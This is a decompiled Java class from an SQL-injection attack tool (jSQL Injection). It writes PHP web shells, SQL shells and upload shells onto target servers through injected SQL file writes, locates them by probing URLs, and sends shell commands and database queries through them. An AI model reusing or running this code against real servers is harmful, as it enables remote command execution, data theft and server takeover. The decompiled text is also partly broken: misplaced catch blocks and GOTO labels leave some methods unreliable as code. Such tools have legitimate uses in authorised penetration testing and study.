/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.CallableFile;
import com.jsql.model.accessible.CallableHttpHead;
import com.jsql.model.bean.util.Header;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.ConnectionUtil;
import com.jsql.util.LogLevel;
import com.jsql.util.StringUtil;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.time.Duration;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.EnumMap;
import java.util.List;
import java.util.Map;
import java.util.UUID;
import java.util.concurrent.CompletionService;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.util.Supplier;

public class ResourceAccess {
    private static final Logger LOGGER = LogManager.getRootLogger();
    public final String filenameWebshell;
    public final String filenameSqlshell;
    public final String filenameUpload;
    private boolean isSearchAdminStopped = false;
    private boolean isScanStopped = false;
    private boolean isSearchFileStopped = false;
    private boolean readingIsAllowed = false;
    private List<CallableFile> callablesReadFile = new ArrayList<CallableFile>();
    private InjectionModel injectionModel;

    public ResourceAccess(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        this.filenameWebshell = "." + this.injectionModel.getVersionJsql() + ".jw.php";
        this.filenameSqlshell = "." + this.injectionModel.getVersionJsql() + ".js.php";
        this.filenameUpload = "." + this.injectionModel.getVersionJsql() + ".ju.php";
    }

    public int callAdminPage(CompletionService<CallableHttpHead> taskCompletionService, int nbAdminPagesFound) {
        int nbAdminPagesFoundFixed = nbAdminPagesFound;
        try {
            CallableHttpHead currentCallable = taskCompletionService.take().get();
            if (currentCallable.isHttpResponseOk()) {
                Request request = new Request();
                request.setMessage(Interaction.CREATE_ADMIN_PAGE_TAB);
                request.setParameters(currentCallable.getUrl());
                this.injectionModel.sendToViews(request);
                ++nbAdminPagesFoundFixed;
                LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Found page: {}", (Object)currentCallable.getUrl());
            }
        }
        catch (InterruptedException e) {
            LOGGER.log(LogLevel.CONSOLE_JAVA, e, (Throwable)e);
            Thread.currentThread().interrupt();
        }
        catch (ExecutionException e) {
            LOGGER.log(LogLevel.CONSOLE_JAVA, e, (Throwable)e);
        }
        return nbAdminPagesFoundFixed;
    }

    public void logSearchAdminPage(int nbAdminPagesFound, int submittedTasks, int tasksHandled) {
        String result = String.format("Found %s admin page%s%s on %s page%s", nbAdminPagesFound, nbAdminPagesFound > 1 ? Character.valueOf('s') : "", tasksHandled != submittedTasks ? " of " + tasksHandled + " processed" : "", submittedTasks, submittedTasks > 1 ? Character.valueOf('s') : "");
        if (nbAdminPagesFound > 0) {
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, result);
        } else {
            LOGGER.log(LogLevel.CONSOLE_ERROR, result);
        }
    }

    public void createWebShell(String pathShell, String urlShell) throws JSqlException, InterruptedException {
        String url;
        String resultInjection;
        if (!this.isReadingAllowed()) {
            return;
        }
        String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.web")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        Object pathShellFixed = pathShell;
        if (!((String)pathShellFixed).matches(".*/$")) {
            pathShellFixed = (String)pathShellFixed + "/";
        }
        this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(sourceShellToInject, (String)pathShellFixed + this.filenameWebshell), "shell:create-web");
        String[] sourcePage = new String[]{""};
        try {
            resultInjection = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead((String)pathShellFixed + this.filenameWebshell), sourcePage, false, 1, null, "webshell");
            if (StringUtils.isEmpty(resultInjection)) {
                throw new JSqlException("payload integrity verification: Empty payload");
            }
        }
        catch (JSqlException e) {
            throw new JSqlException("injected payload does not match source", e);
        }
        Object urlShellFixed = urlShell;
        if (!((String)urlShellFixed).isEmpty()) {
            urlShellFixed = ((String)urlShellFixed).replaceAll("/*$", "") + "/";
        }
        if (StringUtils.isEmpty(url = urlShellFixed)) {
            url = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
        }
        if (resultInjection.indexOf(sourceShellToInject) <= -1) {
            throw this.getIntegrityError(sourcePage);
        }
        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Web payload created into '{}{}'", pathShellFixed, (Object)this.filenameWebshell);
        String urlWithoutProtocol = url.replaceAll("^https?://[^/]*", "");
        String urlProtocol = "/".equals(urlWithoutProtocol) ? url.replaceAll("/+$", "") : url.replace(urlWithoutProtocol, "");
        String urlWithoutFileName = urlWithoutProtocol.replaceAll("[^/]*$", "").replaceAll("/+", "/");
        ArrayList<String> directoryNames = new ArrayList<String>();
        if (urlWithoutFileName.split("/").length == 0) {
            directoryNames.add("/");
        }
        for (String directoryName : urlWithoutFileName.split("/")) {
            directoryNames.add(directoryName + "/");
        }
        this.injectWebshell((String)pathShellFixed, (String)urlShellFixed, urlProtocol, urlWithoutFileName, directoryNames);
    }

    private void injectWebshell(String pathShellFixed, String urlShellFixed, String urlProtocol, String urlWithoutFileName, List<String> directoryNames) throws InterruptedException {
        ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableCreateWebShell");
        ExecutorCompletionService<CallableHttpHead> taskCompletionService = new ExecutorCompletionService<CallableHttpHead>(taskExecutor);
        StringBuilder urlPart = new StringBuilder();
        for (String segment : directoryNames) {
            urlPart.append(segment);
            taskCompletionService.submit(new CallableHttpHead(urlProtocol + urlPart.toString() + this.filenameWebshell, this.injectionModel, "wshell#run"));
        }
        int submittedTasks = directoryNames.size() * 1;
        String urlSuccess = this.injectShell(urlShellFixed, urlProtocol, urlWithoutFileName, taskCompletionService, submittedTasks);
        taskExecutor.shutdown();
        taskExecutor.awaitTermination(5L, TimeUnit.SECONDS);
        if (urlSuccess != null) {
            Request request = new Request();
            request.setMessage(Interaction.CREATE_SHELL_TAB);
            request.setParameters(pathShellFixed.replace(this.filenameWebshell, ""), urlSuccess);
            this.injectionModel.sendToViews(request);
        } else {
            LOGGER.log(LogLevel.CONSOLE_ERROR, "HTTP connection to Web payload not found");
        }
    }

    private String injectShell(String urlShellFixed, String urlProtocol, String urlWithoutFileName, CompletionService<CallableHttpHead> taskCompletionService, int submittedTasks) {
        String urlSuccess = null;
        for (int tasksHandled = 0; tasksHandled < submittedTasks; ++tasksHandled) {
            try {
                CallableHttpHead currentCallable = taskCompletionService.take().get();
                if (currentCallable.isHttpResponseOk()) {
                    urlSuccess = currentCallable.getUrl();
                    if (!urlShellFixed.isEmpty() && urlSuccess.replace(this.filenameWebshell, "").equals(urlShellFixed) || urlSuccess.replace(this.filenameWebshell, "").equals(urlProtocol + urlWithoutFileName)) {
                        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Connection to payload found at expected location '{}'", (Object)urlSuccess);
                        continue;
                    }
                    LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Connection to payload found at unexpected location '{}'", (Object)urlSuccess);
                    continue;
                }
                LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Connection to payload not found at '{}'", (Object)currentCallable.getUrl());
                continue;
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevel.CONSOLE_JAVA, e, (Throwable)e);
                Thread.currentThread().interrupt();
                continue;
            }
            catch (ExecutionException e) {
                LOGGER.log(LogLevel.CONSOLE_JAVA, e, (Throwable)e);
            }
        }
        return urlSuccess;
    }

    private String runCommandShell(String urlCommand) throws IOException {
        String result;
        String pageSource = null;
        try {
            pageSource = this.injectionModel.getMediatorUtils().getConnectionUtil().getSource(urlCommand);
        }
        catch (Exception e) {
            pageSource = "";
        }
        Matcher regexSearch = Pattern.compile("(?s)<SqLi>(.*)<iLQS>").matcher(pageSource);
        regexSearch.find();
        try {
            result = regexSearch.group(1);
        }
        catch (IllegalStateException e) {
            result = "";
            LOGGER.log(LogLevel.CONSOLE_ERROR, "Incorrect response from Web shell", (Throwable)e);
        }
        return result;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     * Loose catch block
     */
    public void runWebShell(String command, UUID uuidShell, String urlShell) {
        Request request;
        Object result = "";
        try {
            result = this.runCommandShell(urlShell + "?c=" + URLEncoder.encode(command.trim(), "ISO-8859-1"));
            if (StringUtils.isBlank((CharSequence)result)) {
                result = "No result.\nTry '" + command.trim() + " 2>&1' to get a system error message.\n";
            }
            request = new Request();
            request.setMessage(Interaction.GET_WEB_SHELL_RESULT);
        }
        catch (UnsupportedEncodingException e) {
            LOGGER.log(LogLevel.CONSOLE_ERROR, String.format("Encoding command to ISO-8859-1 failed: %s", e.getMessage()), (Throwable)e);
            Request request2 = new Request();
            request2.setMessage(Interaction.GET_WEB_SHELL_RESULT);
            request2.setParameters(uuidShell, result);
            this.injectionModel.sendToViews(request2);
        }
        catch (IOException e2) {
            LOGGER.log(LogLevel.CONSOLE_ERROR, String.format("Shell execution error: %s", e2.getMessage()), (Throwable)e2);
            Request request3 = new Request();
            request3.setMessage(Interaction.GET_WEB_SHELL_RESULT);
            {
                catch (Throwable throwable) {
                    Request request4 = new Request();
                    request4.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                    request4.setParameters(uuidShell, result);
                    this.injectionModel.sendToViews(request4);
                    throw throwable;
                }
            }
            request3.setParameters(uuidShell, result);
            this.injectionModel.sendToViews(request3);
        }
        request.setParameters(uuidShell, result);
        this.injectionModel.sendToViews(request);
    }

    public void createSqlShell(String pathShell, String urlShell, String username, String password) throws JSqlException, InterruptedException {
        String url;
        String resultInjection;
        if (!this.isReadingAllowed()) {
            return;
        }
        String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.sql")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        Object pathShellFixed = pathShell;
        if (!((String)pathShellFixed).matches(".*/$")) {
            pathShellFixed = (String)pathShellFixed + "/";
        }
        this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(sourceShellToInject, (String)pathShellFixed + this.filenameSqlshell), "shell:create-sql");
        String[] sourcePage = new String[]{""};
        try {
            resultInjection = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead((String)pathShellFixed + this.filenameSqlshell), sourcePage, false, 1, null, "sqlshell");
            if (StringUtils.isEmpty(resultInjection)) {
                throw new JSqlException("payload integrity verification: Empty payload");
            }
        }
        catch (JSqlException e) {
            throw new JSqlException("injected payload does not match source", e);
        }
        Object urlShellFixed = urlShell;
        if (!((String)urlShellFixed).isEmpty()) {
            urlShellFixed = ((String)urlShellFixed).replaceAll("/*$", "") + "/";
        }
        if (StringUtils.isEmpty(url = urlShellFixed)) {
            url = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
        }
        if (resultInjection.indexOf(sourceShellToInject) <= -1) {
            throw this.getIntegrityError(sourcePage);
        }
        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "SQL payload created into '{}{}'", pathShellFixed, (Object)this.filenameSqlshell);
        String urlWithoutProtocol = url.replaceAll("^https?://[^/]*", "");
        String urlProtocol = "/".equals(urlWithoutProtocol) ? url.replaceAll("/+$", "") : url.replace(urlWithoutProtocol, "");
        String urlWithoutFileName = urlWithoutProtocol.replaceAll("[^/]*$", "").replaceAll("/+", "/");
        ArrayList<String> directoryNames = new ArrayList<String>();
        if (urlWithoutFileName.split("/").length == 0) {
            directoryNames.add("/");
        }
        for (String directoryName : urlWithoutFileName.split("/")) {
            directoryNames.add(directoryName + "/");
        }
        this.injectShell(username, password, (String)pathShellFixed, (String)urlShellFixed, urlProtocol, urlWithoutFileName, directoryNames);
    }

    private void injectShell(String username, String password, String pathShellFixed, String urlShellFixed, String urlProtocol, String urlWithoutFileName, List<String> directoryNames) throws InterruptedException {
        ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableCreateSqlShell");
        ExecutorCompletionService<CallableHttpHead> taskCompletionService = new ExecutorCompletionService<CallableHttpHead>(taskExecutor);
        StringBuilder urlPart = new StringBuilder();
        for (String segment : directoryNames) {
            urlPart.append(segment);
            taskCompletionService.submit(new CallableHttpHead(urlProtocol + urlPart.toString() + this.filenameSqlshell, this.injectionModel, "sqlshell:create"));
        }
        int submittedTasks = directoryNames.size() * 1;
        String urlSuccess = null;
        for (int tasksHandled = 0; tasksHandled < submittedTasks; ++tasksHandled) {
            try {
                CallableHttpHead currentCallable = (CallableHttpHead)taskCompletionService.take().get();
                if (currentCallable.isHttpResponseOk()) {
                    urlSuccess = currentCallable.getUrl();
                    if (!urlShellFixed.isEmpty() && urlSuccess.replace(this.filenameSqlshell, "").equals(urlShellFixed) || urlSuccess.replace(this.filenameSqlshell, "").equals(urlProtocol + urlWithoutFileName)) {
                        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Connection to payload found at expected location '{}'", (Object)urlSuccess);
                        continue;
                    }
                    LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Connection to payload found at unexpected location '{}'", (Object)urlSuccess);
                    continue;
                }
                LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Connection to payload not found at '{}'", (Object)currentCallable.getUrl());
                continue;
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevel.CONSOLE_JAVA, e, (Throwable)e);
                Thread.currentThread().interrupt();
                continue;
            }
            catch (ExecutionException e) {
                LOGGER.log(LogLevel.CONSOLE_JAVA, e, (Throwable)e);
            }
        }
        taskExecutor.shutdown();
        taskExecutor.awaitTermination(5L, TimeUnit.SECONDS);
        if (urlSuccess != null) {
            Request request = new Request();
            request.setMessage(Interaction.CREATE_SQL_SHELL_TAB);
            request.setParameters(pathShellFixed.replace(this.filenameSqlshell, ""), urlSuccess, username, password);
            this.injectionModel.sendToViews(request);
        } else {
            LOGGER.log(LogLevel.CONSOLE_ERROR, "HTTP connection to SQL payload not found");
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     * Unable to fully structure code
     */
    public void runSqlShell(String command, UUID uuidShell, String urlShell, String username, String password) {
        block11: {
            block10: {
                result = "";
                result = this.runCommandShell(String.format("%s?q=%s&u=%s&p=%s", new Object[]{urlShell, URLEncoder.encode(command.trim(), "ISO-8859-1"), username, password}));
                if (result.indexOf("<SQLr>") <= -1) ** GOTO lbl17
                listRows = this.parse((String)result);
                if (!listRows.isEmpty()) break block10;
                request = new Request();
                request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request.setParameters(new Object[]{uuidShell, result, command});
                this.injectionModel.sendToViews(request);
                return;
            }
            try {
                block12: {
                    listFieldsLength = this.parseColumnLength(listRows);
                    result = this.convert(listRows, listFieldsLength);
                    break block12;
lbl17:
                    // 1 sources

                    if (result.indexOf("<SQLm>") > -1) {
                        result = result.replace("<SQLm>", "") + "\n";
                    } else if (result.indexOf("<SQLe>") > -1) {
                        result = result.replace("<SQLe>", "") + "\n";
                    }
                }
                request = new Request();
                request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
            }
            catch (UnsupportedEncodingException e) {
                ResourceAccess.LOGGER.log(LogLevel.CONSOLE_ERROR, String.format("Encoding command to ISO-8859-1 failed: %s", new Object[]{e.getMessage()}), (Throwable)e);
                request = new Request();
                request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request.setParameters(new Object[]{uuidShell, result, command});
                this.injectionModel.sendToViews(request);
                break block11;
            }
            catch (IOException e) {
                ResourceAccess.LOGGER.log(LogLevel.CONSOLE_ERROR, String.format("Shell execution error: %s", new Object[]{e.getMessage()}), (Throwable)e);
                request = new Request();
                request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                {
                    catch (Throwable var9_14) {
                        request = new Request();
                        request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                        request.setParameters(new Object[]{uuidShell, result, command});
                        this.injectionModel.sendToViews(request);
                        throw var9_14;
                    }
                }
                request.setParameters(new Object[]{uuidShell, result, command});
                this.injectionModel.sendToViews(request);
            }
            request.setParameters(new Object[]{uuidShell, result, command});
            this.injectionModel.sendToViews(request);
        }
    }

    private String convert(List<List<String>> listRows, List<Integer> listFieldsLength) {
        StringBuilder tableText = new StringBuilder("+");
        for (Integer n : listFieldsLength) {
            tableText.append("-" + StringUtils.repeat("-", (int)n) + "-+");
        }
        tableText.append("\n");
        for (List list : listRows) {
            tableText.append("|");
            int cursorPosition = 0;
            for (String field : list) {
                tableText.append(" " + field + StringUtils.repeat(" ", listFieldsLength.get(cursorPosition) - field.length()) + " |");
                ++cursorPosition;
            }
            tableText.append("\n");
        }
        tableText.append("+");
        for (Integer n : listFieldsLength) {
            tableText.append("-" + StringUtils.repeat("-", (int)n) + "-+");
        }
        tableText.append("\n");
        return tableText.toString();
    }

    private List<Integer> parseColumnLength(List<List<String>> listRows) {
        ArrayList<Integer> listFieldsLength = new ArrayList<Integer>();
        for (int indexLongestRowSearch = 0; indexLongestRowSearch < listRows.get(0).size(); ++indexLongestRowSearch) {
            int indexLongestRowSearchFinal = indexLongestRowSearch;
            Collections.sort(listRows, (firstRow, secondRow) -> ((String)secondRow.get(indexLongestRowSearchFinal)).length() - ((String)firstRow.get(indexLongestRowSearchFinal)).length());
            listFieldsLength.add(listRows.get(0).get(indexLongestRowSearch).length());
        }
        return listFieldsLength;
    }

    private List<List<String>> parse(String result) {
        ArrayList<List<String>> listRows = new ArrayList<List<String>>();
        Matcher rowsMatcher = Pattern.compile("(?si)<tr>(<td>.*?</td>)</tr>").matcher(result);
        while (rowsMatcher.find()) {
            String values = rowsMatcher.group(1);
            Matcher fieldsMatcher = Pattern.compile("(?si)<td>(.*?)</td>").matcher(values);
            ArrayList<String> listFields = new ArrayList<String>();
            listRows.add(listFields);
            while (fieldsMatcher.find()) {
                String field = fieldsMatcher.group(1);
                listFields.add(field);
            }
        }
        return listRows;
    }

    public void uploadFile(String pathFile, String urlFile, File file) throws JSqlException, IOException, InterruptedException {
        String sourceShellInjected;
        if (!this.isReadingAllowed()) {
            return;
        }
        String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload")).replace("${shell.lead}", "SqLi");
        Object pathShellFixed = pathFile;
        if (!((String)pathShellFixed).matches(".*/$")) {
            pathShellFixed = (String)pathShellFixed + "/";
        }
        this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<SqLi>" + sourceShellToInject + "<iLQS>", (String)pathShellFixed + this.filenameUpload), "upload");
        String[] sourcePage = new String[]{""};
        try {
            sourceShellInjected = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead((String)pathShellFixed + this.filenameUpload), sourcePage, false, 1, null, "upload");
            if (StringUtils.isEmpty(sourceShellInjected)) {
                throw new JSqlException("Bad payload integrity: Empty payload");
            }
        }
        catch (JSqlException e) {
            throw this.getIntegrityError(sourcePage);
        }
        String urlFileFixed = urlFile;
        if (StringUtils.isEmpty(urlFileFixed)) {
            urlFileFixed = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf(47) + 1);
        }
        if (sourceShellInjected.indexOf(sourceShellToInject) > -1) {
            String logUrlFileFixed = urlFileFixed;
            Object logPathShellFixed = pathShellFixed;
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Upload payload deployed at '{}{}' in '{}{}'", () -> logUrlFileFixed, () -> this.filenameUpload, () -> ResourceAccess.lambda$uploadFile$3((String)logPathShellFixed), () -> this.filenameUpload);
            try (FileInputStream streamToUpload = new FileInputStream(file);){
                HttpResponse<String> result = this.upload(file, urlFileFixed + "/" + this.filenameUpload, streamToUpload);
                this.confirmUpload(file, (String)pathShellFixed, urlFileFixed, result);
            }
        } else {
            throw this.getIntegrityError(sourcePage);
        }
        Request request = new Request();
        request.setMessage(Interaction.END_UPLOAD);
        this.injectionModel.sendToViews(request);
    }

    private HttpResponse<String> upload(File file, String string, InputStream streamToUpload) throws IOException, JSqlException, InterruptedException {
        String crLf = "\r\n";
        String boundary = "---------------------------4664151417711";
        byte[] streamData = new byte[streamToUpload.available()];
        if (streamToUpload.read(streamData) == -1) {
            throw new JSqlException("Error reading the file");
        }
        Object headerForm = "";
        headerForm = (String)headerForm + "--" + boundary + crLf;
        headerForm = (String)headerForm + "Content-Disposition: form-data; name=\"u\"; filename=\"" + file.getName() + "\"" + crLf;
        headerForm = (String)headerForm + "Content-Type: binary/octet-stream" + crLf;
        headerForm = (String)headerForm + crLf;
        Object headerFile = "";
        headerFile = (String)headerFile + crLf + "--" + boundary + "--" + crLf;
        HttpRequest httpRequest = HttpRequest.newBuilder().uri(URI.create(string)).timeout(Duration.ofSeconds(15L)).POST(HttpRequest.BodyPublishers.ofByteArrays(Arrays.asList(((String)headerForm).getBytes(), Files.readAllBytes(Paths.get(file.toURI())), ((String)headerFile).getBytes()))).setHeader("Content-Type", "multipart/form-data; boundary=" + boundary).build();
        return this.injectionModel.getMediatorUtils().getConnectionUtil().getHttpClient().send(httpRequest, HttpResponse.BodyHandlers.ofString());
    }

    private void confirmUpload(File file, String pathShellFixed, String urlFileFixed, HttpResponse<String> httpResponse) {
        if (httpResponse.body().indexOf("SqLiy") > -1) {
            Supplier[] supplierArray = new Supplier[2];
            supplierArray[0] = file::getName;
            supplierArray[1] = () -> pathShellFixed;
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, "File '{}' uploaded into '{}'", supplierArray);
        } else {
            Supplier[] supplierArray = new Supplier[2];
            supplierArray[0] = file::getName;
            supplierArray[1] = () -> pathShellFixed;
            LOGGER.log(LogLevel.CONSOLE_ERROR, "Upload file '{}' into '{}' failed", supplierArray);
        }
        Map<String, String> headers = ConnectionUtil.getHeadersMap(httpResponse);
        EnumMap<Header, Object> msgHeader = new EnumMap<Header, Object>(Header.class);
        msgHeader.put(Header.URL, urlFileFixed);
        msgHeader.put(Header.POST, "");
        msgHeader.put(Header.HEADER, "");
        msgHeader.put(Header.RESPONSE, headers);
        msgHeader.put(Header.SOURCE, httpResponse.toString());
        Request request = new Request();
        request.setMessage(Interaction.MESSAGE_HEADER);
        request.setParameters(msgHeader);
        this.injectionModel.sendToViews(request);
    }

    public boolean isReadingAllowed() throws JSqlException {
        if (this.injectionModel.getMediatorVendor().getVendor().instance().getModelYaml().getResource().getFile() == null) {
            LOGGER.log(LogLevel.CONSOLE_ERROR, "Reading file on {} is currently not supported", () -> this.injectionModel.getMediatorVendor().getVendor());
            return false;
        }
        String[] sourcePage = new String[]{""};
        String resultInjection = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlPrivilegeTest(), sourcePage, false, 1, null, "privilege");
        if (StringUtils.isEmpty(resultInjection)) {
            this.injectionModel.sendResponseFromSite("Can't read privilege", sourcePage[0].trim());
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request);
            this.readingIsAllowed = false;
        } else if ("false".equals(resultInjection)) {
            LOGGER.log(LogLevel.CONSOLE_ERROR, "Privilege FILE is not granted to current user, files can't be read");
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request);
            this.readingIsAllowed = false;
        } else {
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_VULNERABLE);
            this.injectionModel.sendToViews(request);
            this.readingIsAllowed = true;
        }
        return this.readingIsAllowed;
    }

    public void stopSearchingFile() {
        this.setSearchFileStopped(true);
        for (CallableFile callable : this.getCallablesReadFile()) {
            callable.getSuspendableReadFile().stop();
        }
    }

    private JSqlException getIntegrityError(String[] sourcePage) {
        return new JSqlException("Wrong payload integrity: " + sourcePage[0].trim().replace("\\n", "\\\\\\n"));
    }

    public boolean isSearchAdminStopped() {
        return this.isSearchAdminStopped;
    }

    public void setSearchAdminStopped(boolean isSearchAdminStopped) {
        this.isSearchAdminStopped = isSearchAdminStopped;
    }

    public void setScanStopped(boolean isScanStopped) {
        this.isScanStopped = isScanStopped;
    }

    public boolean isReadingIsAllowed() {
        return this.readingIsAllowed;
    }

    public void setReadingIsAllowed(boolean readingIsAllowed) {
        this.readingIsAllowed = readingIsAllowed;
    }

    public boolean isScanStopped() {
        return this.isScanStopped;
    }

    public boolean isSearchFileStopped() {
        return this.isSearchFileStopped;
    }

    public void setSearchFileStopped(boolean isSearchFileStopped) {
        this.isSearchFileStopped = isSearchFileStopped;
    }

    public List<CallableFile> getCallablesReadFile() {
        return this.callablesReadFile;
    }

    public void setCallablesReadFile(List<CallableFile> callablesReadFile) {
        this.callablesReadFile = callablesReadFile;
    }

    private static /* synthetic */ Object lambda$uploadFile$3(String logPathShellFixed) {
        return logPathShellFixed;
    }
}

